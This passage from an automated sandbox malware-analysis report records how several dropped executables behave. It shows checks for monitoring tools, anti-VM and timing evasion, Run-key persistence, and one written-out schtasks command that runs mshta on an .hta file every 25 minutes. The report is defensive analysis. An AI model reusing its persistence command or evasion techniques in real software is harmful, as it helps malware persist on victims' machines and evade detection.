                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonClassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: RegmonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: FilemonclassJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Filemonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeWindow searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXEWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: RegmonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: FilemonClass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe  Window searched: window name: Regmonclass
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe  Window searched: window name: Filemonclass
                                      Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe  File created: C:\Windows\Tasks\rapes.job
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8e933e9d51.exe
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0629403be8.exe
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run d101bd5267.exe
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 718edcc992.exe
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe  Code function: 18_2_0065F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput  18_2_0065F98E
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe  Code function: 18_2_006D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed  18_2_006D1C41
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe  Code function: 13_2_009690ED GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress  13_2_009690ED
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\mshta.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                      Malware Analysis System Evasion

                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Code function: 17_2_00408370
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_18-95831
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess graph_17-54642
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_17-53360
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_17-53367
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe System information queried: FirmwareTableInformation
                                      Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe System information queried: FirmwareTableInformation
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe File opened: HKEY_CURRENT_USER\Software\Wine
                                      Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 272E01 second address: 272E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F061A second address: 3F066A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c ja 00007FE310CDC396h 0x00000012 jmp 00007FE310CDC3A1h 0x00000017 jmp 00007FE310CDC3A7h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jne 00007FE310CDC396h 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F066A second address: 3F066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F066E second address: 3F0676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F0676 second address: 3F067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F07F6 second address: 3F0801 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F0801 second address: 3F0807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F0807 second address: 3F0819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FE310CDC398h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F0E13 second address: 3F0E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Eh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F0F7C second address: 3F0F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F44B4 second address: 3F44C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F44C0 second address: 3F44C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F44C5 second address: 3F44CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F44CB second address: 3F4501 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2F05h], ecx 0x00000012 push 00000000h 0x00000014 call 00007FE310CDC399h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007FE310CDC396h 0x00000022 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F4501 second address: 3F4505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F4505 second address: 3F4525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FE310CDC3A8h 0x0000000d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F4525 second address: 3F4574 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FE311181228h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jng 00007FE31118121Ah 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f jnl 00007FE311181229h 0x00000025 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F4574 second address: 3F45C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 ja 00007FE310CDC396h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FE310CDC39Ah 0x00000017 pop eax 0x00000018 or dword ptr [ebp+122D2D88h], esi 0x0000001e push 00000003h 0x00000020 stc 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D361Ah], esi 0x00000029 push 00000003h 0x0000002b and esi, 38697D1Bh 0x00000031 add dword ptr [ebp+122D29E7h], ecx 0x00000037 push A506F156h 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jmp 00007FE310CDC39Eh 0x00000044 pop ebx 0x00000045 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F45C7 second address: 3F4604 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE311181218h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 6506F156h 0x00000013 mov dword ptr [ebp+122D3537h], ecx 0x00000019 lea ebx, dword ptr [ebp+12455208h] 0x0000001f mov dh, 69h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FE311181229h 0x00000029 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 3F4604 second address: 3F460E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FE310CDC396h 0x0000000a rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exe RDTSC instruction interceptor: First address: 415FCA second address: 415FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
